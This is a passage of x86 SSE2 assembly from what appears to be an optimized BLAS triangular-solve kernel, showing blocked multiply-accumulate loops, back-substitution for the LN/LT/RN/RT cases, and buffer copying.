KERNEL5(32 * 2)
KERNEL6(32 * 2)
KERNEL7(32 * 2)
KERNEL8(32 * 2)
cmpl $64 * 3, %eax
NOBRANCH
jle .L11
KERNEL1(32 * 3)
KERNEL2(32 * 3)
KERNEL3(32 * 3)
KERNEL4(32 * 3)
KERNEL5(32 * 3)
KERNEL6(32 * 3)
KERNEL7(32 * 3)
KERNEL8(32 * 3)
cmpl $64 * 4, %eax
NOBRANCH
jle .L11
KERNEL1(32 * 4)
KERNEL2(32 * 4)
KERNEL3(32 * 4)
KERNEL4(32 * 4)
KERNEL5(32 * 4)
KERNEL6(32 * 4)
KERNEL7(32 * 4)
KERNEL8(32 * 4)
cmpl $64 * 5, %eax
NOBRANCH
jle .L11
KERNEL1(32 * 5)
KERNEL2(32 * 5)
KERNEL3(32 * 5)
KERNEL4(32 * 5)
KERNEL5(32 * 5)
KERNEL6(32 * 5)
KERNEL7(32 * 5)
KERNEL8(32 * 5)
cmpl $64 * 6, %eax
NOBRANCH
jle .L11
KERNEL1(32 * 6)
KERNEL2(32 * 6)
KERNEL3(32 * 6)
KERNEL4(32 * 6)
KERNEL5(32 * 6)
KERNEL6(32 * 6)
KERNEL7(32 * 6)
KERNEL8(32 * 6)
cmpl $64 * 7, %eax
NOBRANCH
jle .L11
KERNEL1(32 * 7)
KERNEL2(32 * 7)
KERNEL3(32 * 7)
KERNEL4(32 * 7)
KERNEL5(32 * 7)
KERNEL6(32 * 7)
KERNEL7(32 * 7)
KERNEL8(32 * 7)
addl $64 * 4 * SIZE, AA
addl $64 * 4 * SIZE, BB
subl $64 * 8, %eax
BRANCH
jg .L1X
.L11:
leal (AA, %eax, 4), AA
leal (BB, %eax, 4), BB
#else
sarl $3, %eax
je .L12
.L11:
KERNEL1(32 * 0)
KERNEL2(32 * 0)
KERNEL3(32 * 0)
KERNEL4(32 * 0)
KERNEL5(32 * 0)
KERNEL6(32 * 0)
KERNEL7(32 * 0)
KERNEL8(32 * 0)
addl $32 * SIZE, %ecx
addl $32 * SIZE, %edx
decl %eax
jne .L11
#endif
.L12:
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
andl $7, %eax # if (k & 7)
BRANCH
je .L14
.L13:
mulpd %xmm0, %xmm2
mulpd 2 * SIZE(BB), %xmm0
addpd %xmm2, %xmm4
movapd 0 * SIZE(BB), %xmm2
addpd %xmm0, %xmm5
movapd 2 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm2
mulpd 2 * SIZE(BB), %xmm0
addpd %xmm2, %xmm6
movapd 4 * SIZE(BB), %xmm2
addpd %xmm0, %xmm7
movapd 4 * SIZE(AA), %xmm0
addl $4 * SIZE, AA # aoffset += 4
addl $4 * SIZE, BB # boffset1 += 4
subl $1, %eax
jg .L13
ALIGN_4
.L14:
#if defined(LN) || defined(RT)
movl KK, %eax
#ifdef LN
subl $4, %eax
#else
subl $2, %eax
#endif
movl AORIG, AA
movl BORIG, B
leal BUFFER, BB
leal (, %eax, SIZE), %eax
leal (AA, %eax, 4), AA
leal (B, %eax, 2), B
leal (BB, %eax, 4), BB
#endif
#if defined(LN) || defined(LT)
movapd %xmm4, %xmm0
unpcklpd %xmm5, %xmm4
unpckhpd %xmm5, %xmm0
movapd %xmm6, %xmm1
unpcklpd %xmm7, %xmm6
unpckhpd %xmm7, %xmm1
movapd 0 * SIZE(B), %xmm2
movapd 2 * SIZE(B), %xmm3
movapd 4 * SIZE(B), %xmm5
movapd 6 * SIZE(B), %xmm7
subpd %xmm4, %xmm2
subpd %xmm0, %xmm3
subpd %xmm6, %xmm5
subpd %xmm1, %xmm7
#else
movapd 0 * SIZE(AA), %xmm0
movapd 2 * SIZE(AA), %xmm1
movapd 4 * SIZE(AA), %xmm2
movapd 6 * SIZE(AA), %xmm3
subpd %xmm4, %xmm0
subpd %xmm6, %xmm1
subpd %xmm5, %xmm2
subpd %xmm7, %xmm3
#endif
#ifdef LN
movsd 15 * SIZE(AA), %xmm0
movhpd 15 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm7
movsd 14 * SIZE(AA), %xmm0
movhpd 14 * SIZE(AA), %xmm0
mulpd %xmm7, %xmm0
subpd %xmm0, %xmm5
movsd 13 * SIZE(AA), %xmm0
movhpd 13 * SIZE(AA), %xmm0
mulpd %xmm7, %xmm0
subpd %xmm0, %xmm3
movsd 12 * SIZE(AA), %xmm0
movhpd 12 * SIZE(AA), %xmm0
mulpd %xmm7, %xmm0
subpd %xmm0, %xmm2
movsd 10 * SIZE(AA), %xmm0
movhpd 10 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm5
movsd 9 * SIZE(AA), %xmm0
movhpd 9 * SIZE(AA), %xmm0
mulpd %xmm5, %xmm0
subpd %xmm0, %xmm3
movsd 8 * SIZE(AA), %xmm0
movhpd 8 * SIZE(AA), %xmm0
mulpd %xmm5, %xmm0
subpd %xmm0, %xmm2
movsd 5 * SIZE(AA), %xmm0
movhpd 5 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm3
movsd 4 * SIZE(AA), %xmm0
movhpd 4 * SIZE(AA), %xmm0
mulpd %xmm3, %xmm0
subpd %xmm0, %xmm2
movsd 0 * SIZE(AA), %xmm0
movhpd 0 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm2
#endif
#ifdef LT
movsd 0 * SIZE(AA), %xmm0
movhpd 0 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm2
movsd 1 * SIZE(AA), %xmm0
movhpd 1 * SIZE(AA), %xmm0
mulpd %xmm2, %xmm0
subpd %xmm0, %xmm3
movsd 2 * SIZE(AA), %xmm0
movhpd 2 * SIZE(AA), %xmm0
mulpd %xmm2, %xmm0
subpd %xmm0, %xmm5
movsd 3 * SIZE(AA), %xmm0
movhpd 3 * SIZE(AA), %xmm0
mulpd %xmm2, %xmm0
subpd %xmm0, %xmm7
movsd 5 * SIZE(AA), %xmm0
movhpd 5 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm3
movsd 6 * SIZE(AA), %xmm0
movhpd 6 * SIZE(AA), %xmm0
mulpd %xmm3, %xmm0
subpd %xmm0, %xmm5
movsd 7 * SIZE(AA), %xmm0
movhpd 7 * SIZE(AA), %xmm0
mulpd %xmm3, %xmm0
subpd %xmm0, %xmm7
movsd 10 * SIZE(AA), %xmm0
movhpd 10 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm5
movsd 11 * SIZE(AA), %xmm0
movhpd 11 * SIZE(AA), %xmm0
mulpd %xmm5, %xmm0
subpd %xmm0, %xmm7
movsd 15 * SIZE(AA), %xmm0
movhpd 15 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm7
#endif
#ifdef RN
movsd 0 * SIZE(B), %xmm4
movhpd 0 * SIZE(B), %xmm4
mulpd %xmm4, %xmm0
mulpd %xmm4, %xmm1
movsd 1 * SIZE(B), %xmm4
movhpd 1 * SIZE(B), %xmm4
mulpd %xmm0, %xmm4
subpd %xmm4, %xmm2
movsd 1 * SIZE(B), %xmm4
movhpd 1 * SIZE(B), %xmm4
mulpd %xmm1, %xmm4
subpd %xmm4, %xmm3
movsd 3 * SIZE(B), %xmm4
movhpd 3 * SIZE(B), %xmm4
mulpd %xmm4, %xmm2
mulpd %xmm4, %xmm3
#endif
#ifdef RT
movsd 3 * SIZE(B), %xmm4
movhpd 3 * SIZE(B), %xmm4
mulpd %xmm4, %xmm2
mulpd %xmm4, %xmm3
movsd 2 * SIZE(B), %xmm4
movhpd 2 * SIZE(B), %xmm4
mulpd %xmm2, %xmm4
subpd %xmm4, %xmm0
movsd 2 * SIZE(B), %xmm4
movhpd 2 * SIZE(B), %xmm4
mulpd %xmm3, %xmm4
subpd %xmm4, %xmm1
movsd 0 * SIZE(B), %xmm4
movhpd 0 * SIZE(B), %xmm4
mulpd %xmm4, %xmm0
mulpd %xmm4, %xmm1
#endif
#if defined(LN) || defined(LT)
movapd %xmm2, 0 * SIZE(B)
movapd %xmm3, 2 * SIZE(B)
movapd %xmm5, 4 * SIZE(B)
movapd %xmm7, 6 * SIZE(B)
movsd %xmm2, 0 * SIZE(BB)
movsd %xmm2, 1 * SIZE(BB)
movhpd %xmm2, 2 * SIZE(BB)
movhpd %xmm2, 3 * SIZE(BB)
movsd %xmm3, 4 * SIZE(BB)
movsd %xmm3, 5 * SIZE(BB)
movhpd %xmm3, 6 * SIZE(BB)
movhpd %xmm3, 7 * SIZE(BB)
movsd %xmm5, 8 * SIZE(BB)
movsd %xmm5, 9 * SIZE(BB)
movhpd %xmm5, 10 * SIZE(BB)
movhpd %xmm5, 11 * SIZE(BB)
movsd %xmm7, 12 * SIZE(BB)
movsd %xmm7, 13 * SIZE(BB)
movhpd %xmm7, 14 * SIZE(BB)
movhpd %xmm7, 15 * SIZE(BB)
#else
movapd %xmm0, 0 * SIZE(AA)
movapd %xmm1, 2 * SIZE(AA)
movapd %xmm2, 4 * SIZE(AA)
movapd %xmm3, 6 * SIZE(AA)
#endif
#ifdef LN
subl $4 * SIZE, %esi
#endif
#if defined(LN) || defined(LT)
movsd %xmm2, 0 * SIZE(%esi)
movsd %xmm3, 1 * SIZE(%esi)
movsd %xmm5, 2 * SIZE(%esi)
movsd %xmm7, 3 * SIZE(%esi)
movhpd %xmm2, 0 * SIZE(%esi, LDC)
movhpd %xmm3, 1 * SIZE(%esi, LDC)
movhpd %xmm5, 2 * SIZE(%esi, LDC)
movhpd %xmm7, 3 * SIZE(%esi, LDC)
#else
movsd %xmm0, 0 * SIZE(%esi)
movhpd %xmm0, 1 * SIZE(%esi)
movsd %xmm1, 2 * SIZE(%esi)
movhpd %xmm1, 3 * SIZE(%esi)
movsd %xmm2, 0 * SIZE(%esi, LDC)
movhpd %xmm2, 1 * SIZE(%esi, LDC)
movsd %xmm3, 2 * SIZE(%esi, LDC)
movhpd %xmm3, 3 * SIZE(%esi, LDC)
#endif
#ifndef LN
addl $4 * SIZE, %esi
#endif
#if defined(LT) || defined(RN)
movl K, %eax
subl KK, %eax
leal (,%eax, SIZE), %eax
leal (AA, %eax, 4), AA
#ifdef LT
addl $8 * SIZE, B
#endif
#endif
#ifdef LN
subl $4, KK
movl BORIG, B
#endif
#ifdef LT
addl $4, KK
#endif
#ifdef RT
movl K, %eax
movl BORIG, B
sall $2 + BASE_SHIFT, %eax
addl %eax, AORIG
#endif
decl %ebx # i --
jg .L10
ALIGN_2
.L30:
movl M, %ebx
testl $2, %ebx
jle .L50
#ifdef LN
movl K, %eax
sall $1 + BASE_SHIFT, %eax
subl %eax, AORIG
#endif
#if defined(LN) || defined(RT)
movl KK, %eax
movl AORIG, AA
leal (, %eax, SIZE), %eax
leal (AA, %eax, 2), AA
#endif
leal BUFFER, BB
#if defined(LN) || defined(RT)
movl KK, %eax
sall $1 + BASE_SHIFT, %eax
leal (BB, %eax, 2), BB
#endif
movapd 0 * SIZE(BB), %xmm2
pxor %xmm4, %xmm4
movapd 0 * SIZE(AA), %xmm0
pxor %xmm5, %xmm5
movapd 8 * SIZE(BB), %xmm3
pxor %xmm6, %xmm6
movapd 8 * SIZE(AA), %xmm1
pxor %xmm7, %xmm7
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
sarl $3, %eax
je .L32
.L31:
mulpd %xmm0, %xmm2
mulpd 2 * SIZE(BB), %xmm0
addpd %xmm2, %xmm4
movapd 4 * SIZE(BB), %xmm2
addpd %xmm0, %xmm5
movapd 2 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm2
mulpd 6 * SIZE(BB), %xmm0
addpd %xmm2, %xmm6
movapd 16 * SIZE(BB), %xmm2
addpd %xmm0, %xmm7
movapd 4 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm3
mulpd 10 * SIZE(BB), %xmm0
addpd %xmm3, %xmm4
movapd 12 * SIZE(BB), %xmm3
addpd %xmm0, %xmm5
movapd 6 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm3
mulpd 14 * SIZE(BB), %xmm0
addpd %xmm3, %xmm6
movapd 24 * SIZE(BB), %xmm3
addpd %xmm0, %xmm7
movapd 16 * SIZE(AA), %xmm0
mulpd %xmm1, %xmm2
mulpd 18 * SIZE(BB), %xmm1
addpd %xmm2, %xmm4
movapd 20 * SIZE(BB), %xmm2
addpd %xmm1, %xmm5
movapd 10 * SIZE(AA), %xmm1
mulpd %xmm1, %xmm2
mulpd 22 * SIZE(BB), %xmm1
addpd %xmm2, %xmm6
movapd 32 * SIZE(BB), %xmm2
addpd %xmm1, %xmm7
movapd 12 * SIZE(AA), %xmm1
mulpd %xmm1, %xmm3
mulpd 26 * SIZE(BB), %xmm1
addpd %xmm3, %xmm4
movapd 28 * SIZE(BB), %xmm3
addpd %xmm1, %xmm5
movapd 14 * SIZE(AA), %xmm1
mulpd %xmm1, %xmm3
mulpd 30 * SIZE(BB), %xmm1
addpd %xmm3, %xmm6
movapd 40 * SIZE(BB), %xmm3
addpd %xmm1, %xmm7
movapd 24 * SIZE(AA), %xmm1
addl $16 * SIZE, AA
addl $32 * SIZE, BB
BRANCH
decl %eax
jne .L31
.L32:
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
andl $7, %eax # if (k & 7)
BRANCH
je .L34
.L33:
mulpd %xmm0, %xmm2
mulpd 2 * SIZE(BB), %xmm0
addpd %xmm2, %xmm4
movapd 4 * SIZE(BB), %xmm2
addpd %xmm0, %xmm5
movapd 2 * SIZE(AA), %xmm0
addl $2 * SIZE, AA # aoffset += 2
addl $4 * SIZE, BB # boffset1 += 4
decl %eax
BRANCH
jg .L33
ALIGN_4
.L34:
addpd %xmm6, %xmm4
addpd %xmm7, %xmm5
#if defined(LN) || defined(RT)
movl KK, %eax
#ifdef LN
subl $2, %eax
#else
subl $2, %eax
#endif
movl AORIG, AA
movl BORIG, B
leal BUFFER, BB
leal (, %eax, SIZE), %eax
leal (AA, %eax, 2), AA
leal (B, %eax, 2), B
leal (BB, %eax, 4), BB
#endif
#if defined(LN) || defined(LT)
movapd %xmm4, %xmm0
unpcklpd %xmm5, %xmm4
unpckhpd %xmm5, %xmm0
movapd 0 * SIZE(B), %xmm2
movapd 2 * SIZE(B), %xmm3
subpd %xmm4, %xmm2
subpd %xmm0, %xmm3
#else
movapd 0 * SIZE(AA), %xmm0
movapd 2 * SIZE(AA), %xmm1
subpd %xmm4, %xmm0
subpd %xmm5, %xmm1
#endif
#ifdef LN
movsd 3 * SIZE(AA), %xmm0
movhpd 3 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm3
movsd 2 * SIZE(AA), %xmm0
movhpd 2 * SIZE(AA), %xmm0
mulpd %xmm3, %xmm0
subpd %xmm0, %xmm2
movsd 0 * SIZE(AA), %xmm0
movhpd 0 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm2
#endif
#ifdef LT
movsd 0 * SIZE(AA), %xmm0
movhpd 0 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm2
movsd 1 * SIZE(AA), %xmm0
movhpd 1 * SIZE(AA), %xmm0
mulpd %xmm2, %xmm0
subpd %xmm0, %xmm3
movsd 3 * SIZE(AA), %xmm0
movhpd 3 * SIZE(AA), %xmm0
mulpd %xmm0, %xmm3
#endif
#ifdef RN
movsd 0 * SIZE(B), %xmm4
movhpd 0 * SIZE(B), %xmm4
mulpd %xmm4, %xmm0
movsd 1 * SIZE(B), %xmm4
movhpd 1 * SIZE(B), %xmm4
mulpd %xmm0, %xmm4
subpd %xmm4, %xmm1
movsd 3 * SIZE(B), %xmm4
movhpd 3 * SIZE(B), %xmm4
mulpd %xmm4, %xmm1
#endif
#ifdef RT
movsd 3 * SIZE(B), %xmm4
movhpd 3 * SIZE(B), %xmm4
mulpd %xmm4, %xmm1
movsd 2 * SIZE(B), %xmm4
movhpd 2 * SIZE(B), %xmm4
mulpd %xmm1, %xmm4
subpd %xmm4, %xmm0
movsd 0 * SIZE(B), %xmm4
movhpd 0 * SIZE(B), %xmm4
mulpd %xmm4, %xmm0
#endif
#if defined(LN) || defined(LT)
movapd %xmm2, 0 * SIZE(B)
movapd %xmm3, 2 * SIZE(B)
movsd %xmm2, 0 * SIZE(BB)
movsd %xmm2, 1 * SIZE(BB)
movhpd %xmm2, 2 * SIZE(BB)
movhpd %xmm2, 3 * SIZE(BB)
movsd %xmm3, 4 * SIZE(BB)
movsd %xmm3, 5 * SIZE(BB)
movhpd %xmm3, 6 * SIZE(BB)
movhpd %xmm3, 7 * SIZE(BB)
#else
movapd %xmm0, 0 * SIZE(AA)
movapd %xmm1, 2 * SIZE(AA)
#endif
#ifdef LN
subl $2 * SIZE, %esi
#endif
#if defined(LN) || defined(LT)
movsd %xmm2, 0 * SIZE(%esi)
movsd %xmm3, 1 * SIZE(%esi)
movhpd %xmm2, 0 * SIZE(%esi, LDC)
movhpd %xmm3, 1 * SIZE(%esi, LDC)
#else
movsd %xmm0, 0 * SIZE(%esi)
movhpd %xmm0, 1 * SIZE(%esi)
movsd %xmm1, 0 * SIZE(%esi, LDC)
movhpd %xmm1, 1 * SIZE(%esi, LDC)
#endif
#ifndef LN
addl $2 * SIZE, %esi
#endif
#if defined(LT) || defined(RN)
movl K, %eax
subl KK, %eax
leal (,%eax, SIZE), %eax
leal (AA, %eax, 2), AA
#ifdef LT
addl $4 * SIZE, B
#endif
#endif
#ifdef LN
subl $2, KK
movl BORIG, B
#endif
#ifdef LT
addl $2, KK
#endif
#ifdef RT
movl K, %eax
movl BORIG, B
sall $1 + BASE_SHIFT, %eax
addl %eax, AORIG
#endif
ALIGN_2
.L50:
movl M, %ebx
testl $1, %ebx
jle .L99
#ifdef LN
movl K, %eax
sall $0 + BASE_SHIFT, %eax
subl %eax, AORIG
#endif
#if defined(LN) || defined(RT)
movl KK, %eax
movl AORIG, AA
leal (, %eax, SIZE), %eax
leal (AA, %eax, 1), AA
#endif
leal BUFFER, %ecx
#if defined(LN) || defined(RT)
movl KK, %eax
sall $1 + BASE_SHIFT, %eax
leal (BB, %eax, 2), BB
#endif
movsd 0 * SIZE(BB), %xmm2
pxor %xmm4, %xmm4
movsd 0 * SIZE(AA), %xmm0
pxor %xmm5, %xmm5
movsd 8 * SIZE(BB), %xmm3
pxor %xmm6, %xmm6
movsd 4 * SIZE(AA), %xmm1
pxor %xmm7, %xmm7
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
sarl $3, %eax
je .L52
.L51:
mulsd %xmm0, %xmm2
mulsd 2 * SIZE(BB), %xmm0
addsd %xmm2, %xmm4
movsd 4 * SIZE(BB), %xmm2
addsd %xmm0, %xmm5
movsd 1 * SIZE(AA), %xmm0
mulsd %xmm0, %xmm2
mulsd 6 * SIZE(BB), %xmm0
addsd %xmm2, %xmm4
movsd 16 * SIZE(BB), %xmm2
addsd %xmm0, %xmm5
movsd 2 * SIZE(AA), %xmm0
mulsd %xmm0, %xmm3
mulsd 10 * SIZE(BB), %xmm0
addsd %xmm3, %xmm4
movsd 12 * SIZE(BB), %xmm3
addsd %xmm0, %xmm5
movsd 3 * SIZE(AA), %xmm0
mulsd %xmm0, %xmm3
mulsd 14 * SIZE(BB), %xmm0
addsd %xmm3, %xmm4
movsd 24 * SIZE(BB), %xmm3
addsd %xmm0, %xmm5
movsd 8 * SIZE(AA), %xmm0
mulsd %xmm1, %xmm2
mulsd 18 * SIZE(BB), %xmm1
addsd %xmm2, %xmm4
movsd 20 * SIZE(BB), %xmm2
addsd %xmm1, %xmm5
movsd 5 * SIZE(AA), %xmm1
mulsd %xmm1, %xmm2
mulsd 22 * SIZE(BB), %xmm1
addsd %xmm2, %xmm4
movsd 32 * SIZE(BB), %xmm2
addsd %xmm1, %xmm5
movsd 6 * SIZE(AA), %xmm1
mulsd %xmm1, %xmm3
mulsd 26 * SIZE(BB), %xmm1
addsd %xmm3, %xmm4
movsd 28 * SIZE(BB), %xmm3
addsd %xmm1, %xmm5
movsd 7 * SIZE(AA), %xmm1
mulsd %xmm1, %xmm3
mulsd 30 * SIZE(BB), %xmm1
addsd %xmm3, %xmm4
movsd 40 * SIZE(BB), %xmm3
addsd %xmm1, %xmm5
movsd 12 * SIZE(AA), %xmm1
addl $ 8 * SIZE, AA
addl $32 * SIZE, BB
BRANCH
decl %eax
jne .L51
.L52:
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
andl $7, %eax # k & 7 remaining iterations
BRANCH
je .L54
.L53:
mulsd %xmm0, %xmm2
mulsd 2 * SIZE(BB), %xmm0
addsd %xmm2, %xmm4
movsd 4 * SIZE(BB), %xmm2
addsd %xmm0, %xmm5
movsd 1 * SIZE(AA), %xmm0
addl $1 * SIZE, AA # aoffset += 1 * SIZE
addl $4 * SIZE, BB # boffset1 += 4 * SIZE
decl %eax
BRANCH
jg .L53
ALIGN_4
.L54:
addsd %xmm6, %xmm4
addsd %xmm7, %xmm5
#if defined(LN) || defined(RT)
movl KK, %eax
#ifdef LN
subl $1, %eax
#else
subl $2, %eax
#endif
movl AORIG, AA
movl BORIG, B
leal BUFFER, BB
leal (, %eax, SIZE), %eax
leal (AA, %eax, 1), AA
leal (B, %eax, 2), B
leal (BB, %eax, 4), BB
#endif
#if defined(LN) || defined(LT)
movsd 0 * SIZE(B), %xmm0
movsd 1 * SIZE(B), %xmm1
#else
movsd 0 * SIZE(AA), %xmm0
movsd 1 * SIZE(AA), %xmm1
#endif
subsd %xmm4, %xmm0
subsd %xmm5, %xmm1
#if defined(LN) || defined(LT)
movsd 0 * SIZE(AA), %xmm2
mulsd %xmm2, %xmm0
mulsd %xmm2, %xmm1
#endif
#ifdef RN
mulsd 0 * SIZE(B), %xmm0
movsd 1 * SIZE(B), %xmm4
mulsd %xmm0, %xmm4
subsd %xmm4, %xmm1
mulsd 3 * SIZE(B), %xmm1
#endif
#ifdef RT
mulsd 3 * SIZE(B), %xmm1
movsd 2 * SIZE(B), %xmm4
mulsd %xmm1, %xmm4
subsd %xmm4, %xmm0
mulsd 0 * SIZE(B), %xmm0
#endif
#if defined(LN) || defined(LT)
movsd %xmm0, 0 * SIZE(B)
movsd %xmm1, 1 * SIZE(B)
movsd %xmm0, 0 * SIZE(BB)
movsd %xmm0, 1 * SIZE(BB)
movsd %xmm1, 2 * SIZE(BB)
movsd %xmm1, 3 * SIZE(BB)
#else
movsd %xmm0, 0 * SIZE(AA)
movsd %xmm1, 1 * SIZE(AA)
#endif
#ifdef LN
subl $1 * SIZE, %esi
#endif
movsd %xmm0, 0 * SIZE(%esi)
movsd %xmm1, 0 * SIZE(%esi, LDC)
#ifndef LN
addl $1 * SIZE, %esi
#endif
#if defined(LT) || defined(RN)
movl K, %eax
subl KK, %eax
leal (,%eax, SIZE), %eax
leal (AA, %eax, 1), AA
#ifdef LT
addl $2 * SIZE, B
#endif
#endif
#ifdef LN
subl $1, KK
movl BORIG, B
#endif
#ifdef LT
addl $1, KK
#endif
#ifdef RT
movl K, %eax
movl BORIG, B
sall $0 + BASE_SHIFT, %eax
addl %eax, AORIG
#endif
ALIGN_2
.L99:
#ifdef LN
movl K, %eax
leal (, %eax, SIZE), %eax
leal (B, %eax, 2), B
#endif
#if defined(LT) || defined(RN)
movl K, %eax
subl KK, %eax
leal (,%eax, SIZE), %eax
leal (B, %eax, 2), B
#endif
#ifdef RN
addl $2, KK
#endif
#ifdef RT
subl $2, KK
#endif
decl J # j --
jg .L01
ALIGN_2
.L100:
movl N, %eax
testl $1, %eax
jle .L999
ALIGN_2
.L101:
/* Copying to Sub Buffer */
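/* Each scalar of B is broadcast into both lanes of an SSE2 register
   (unpcklpd x, x below) before being stored to BUFFER, so the compute
   loops can use a single packed mulpd against two consecutive rows of A. */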
#ifdef LN
movl OFFSET, %eax
addl M, %eax
movl %eax, KK
#endif
leal BUFFER, %ecx
#ifdef RT
movl K, %eax
sall $0 + BASE_SHIFT, %eax
subl %eax, B
#endif
#if defined(LN) || defined(RT)
movl KK, %eax
movl B, BORIG
leal (, %eax, SIZE), %eax
leal (B, %eax, 1), B
leal (BB, %eax, 2), BB
#endif
#ifdef LT
movl OFFSET, %eax
movl %eax, KK
#endif
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
sarl $3, %eax
jle .L103
ALIGN_4
.L102:
movsd 0 * SIZE(B), %xmm0
movsd 1 * SIZE(B), %xmm1
movsd 2 * SIZE(B), %xmm2
movsd 3 * SIZE(B), %xmm3
movsd 4 * SIZE(B), %xmm4
movsd 5 * SIZE(B), %xmm5
movsd 6 * SIZE(B), %xmm6
movsd 7 * SIZE(B), %xmm7
unpcklpd %xmm0, %xmm0
unpcklpd %xmm1, %xmm1
unpcklpd %xmm2, %xmm2
unpcklpd %xmm3, %xmm3
unpcklpd %xmm4, %xmm4
unpcklpd %xmm5, %xmm5
unpcklpd %xmm6, %xmm6
unpcklpd %xmm7, %xmm7
movapd %xmm0, 0 * SIZE(%ecx)
movapd %xmm1, 2 * SIZE(%ecx)
movapd %xmm2, 4 * SIZE(%ecx)
movapd %xmm3, 6 * SIZE(%ecx)
movapd %xmm4, 8 * SIZE(%ecx)
movapd %xmm5, 10 * SIZE(%ecx)
movapd %xmm6, 12 * SIZE(%ecx)
movapd %xmm7, 14 * SIZE(%ecx)
prefetcht0 104 * SIZE(B)
addl $ 8 * SIZE, B
addl $16 * SIZE, %ecx
decl %eax
BRANCH
jne .L102
ALIGN_2
.L103:
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
andl $7, %eax
BRANCH
jle .L105
ALIGN_2
.L104:
movsd 0 * SIZE(B), %xmm0
unpcklpd %xmm0, %xmm0
movapd %xmm0, 0 * SIZE(%ecx)
addl $1 * SIZE, B
addl $2 * SIZE, %ecx
decl %eax
jne .L104
ALIGN_4
.L105:
#if defined(LT) || defined(RN)
movl A, AA
#else
movl A, %eax
movl %eax, AORIG
#endif
#ifdef RT
subl LDC, C
#endif
movl C, %esi # coffset = c
#ifndef RT
addl LDC, C
#endif
movl M, %ebx
sarl $2, %ebx # i = (m >> 2)
jle .L130
ALIGN_4
.L110:
#ifdef LN
movl K, %eax
sall $2 + BASE_SHIFT, %eax
subl %eax, AORIG
#endif
#if defined(LN) || defined(RT)
movl KK, %eax
movl AORIG, AA
leal (, %eax, SIZE), %eax
leal (AA, %eax, 4), AA
#endif
leal BUFFER, BB
#if defined(LN) || defined(RT)
movl KK, %eax
sall $0 + BASE_SHIFT, %eax
leal (BB, %eax, 2), BB
#endif
movapd 0 * SIZE(BB), %xmm2
pxor %xmm4, %xmm4
movapd 0 * SIZE(AA), %xmm0
pxor %xmm5, %xmm5
movapd 8 * SIZE(BB), %xmm3
pxor %xmm6, %xmm6
movapd 8 * SIZE(AA), %xmm1
pxor %xmm7, %xmm7
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
sarl $3, %eax
je .L112
.L111:
mulpd %xmm2, %xmm0
mulpd 2 * SIZE(AA), %xmm2
addpd %xmm0, %xmm4
movapd 4 * SIZE(AA), %xmm0
addpd %xmm2, %xmm6
movapd 2 * SIZE(BB), %xmm2
mulpd %xmm2, %xmm0
mulpd 6 * SIZE(AA), %xmm2
addpd %xmm0, %xmm5
movapd 16 * SIZE(AA), %xmm0
addpd %xmm2, %xmm7
movapd 4 * SIZE(BB), %xmm2
mulpd %xmm2, %xmm1
mulpd 10 * SIZE(AA), %xmm2
addpd %xmm1, %xmm4
movapd 12 * SIZE(AA), %xmm1
addpd %xmm2, %xmm6
movapd 6 * SIZE(BB), %xmm2
mulpd %xmm2, %xmm1
mulpd 14 * SIZE(AA), %xmm2
addpd %xmm1, %xmm5
movapd 24 * SIZE(AA), %xmm1
addpd %xmm2, %xmm7
movapd 16 * SIZE(BB), %xmm2
mulpd %xmm3, %xmm0
mulpd 18 * SIZE(AA), %xmm3
addpd %xmm0, %xmm4
movapd 20 * SIZE(AA), %xmm0
addpd %xmm3, %xmm6
movapd 10 * SIZE(BB), %xmm3
mulpd %xmm3, %xmm0
mulpd 22 * SIZE(AA), %xmm3
addpd %xmm0, %xmm5
movapd 32 * SIZE(AA), %xmm0
addpd %xmm3, %xmm7
movapd 12 * SIZE(BB), %xmm3
mulpd %xmm3, %xmm1
mulpd 26 * SIZE(AA), %xmm3
addpd %xmm1, %xmm4
movapd 28 * SIZE(AA), %xmm1
addpd %xmm3, %xmm6
movapd 14 * SIZE(BB), %xmm3
mulpd %xmm3, %xmm1
mulpd 30 * SIZE(AA), %xmm3
addpd %xmm1, %xmm5
movapd 40 * SIZE(AA), %xmm1
addpd %xmm3, %xmm7
movapd 24 * SIZE(BB), %xmm3
addl $32 * SIZE, AA
addl $16 * SIZE, BB
decl %eax
jne .L111
.L112:
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
andl $7, %eax # k & 7 remaining iterations
BRANCH
je .L114
.L113:
mulpd %xmm2, %xmm0
mulpd 2 * SIZE(AA), %xmm2
addpd %xmm0, %xmm4
movapd 4 * SIZE(AA), %xmm0
addpd %xmm2, %xmm6
movapd 2 * SIZE(BB), %xmm2
addl $4 * SIZE, AA # aoffset += 4 * SIZE
addl $2 * SIZE, BB # boffset1 += 2 * SIZE
subl $1, %eax
jg .L113
ALIGN_4
.L114:
addpd %xmm5, %xmm4
addpd %xmm7, %xmm6
#if defined(LN) || defined(RT)
movl KK, %eax
#ifdef LN
subl $4, %eax
#else
subl $1, %eax
#endif
movl AORIG, AA
movl BORIG, B
leal BUFFER, BB
leal (, %eax, SIZE), %eax
leal (AA, %eax, 4), AA
leal (B, %eax, 1), B
leal (BB, %eax, 2), BB
#endif
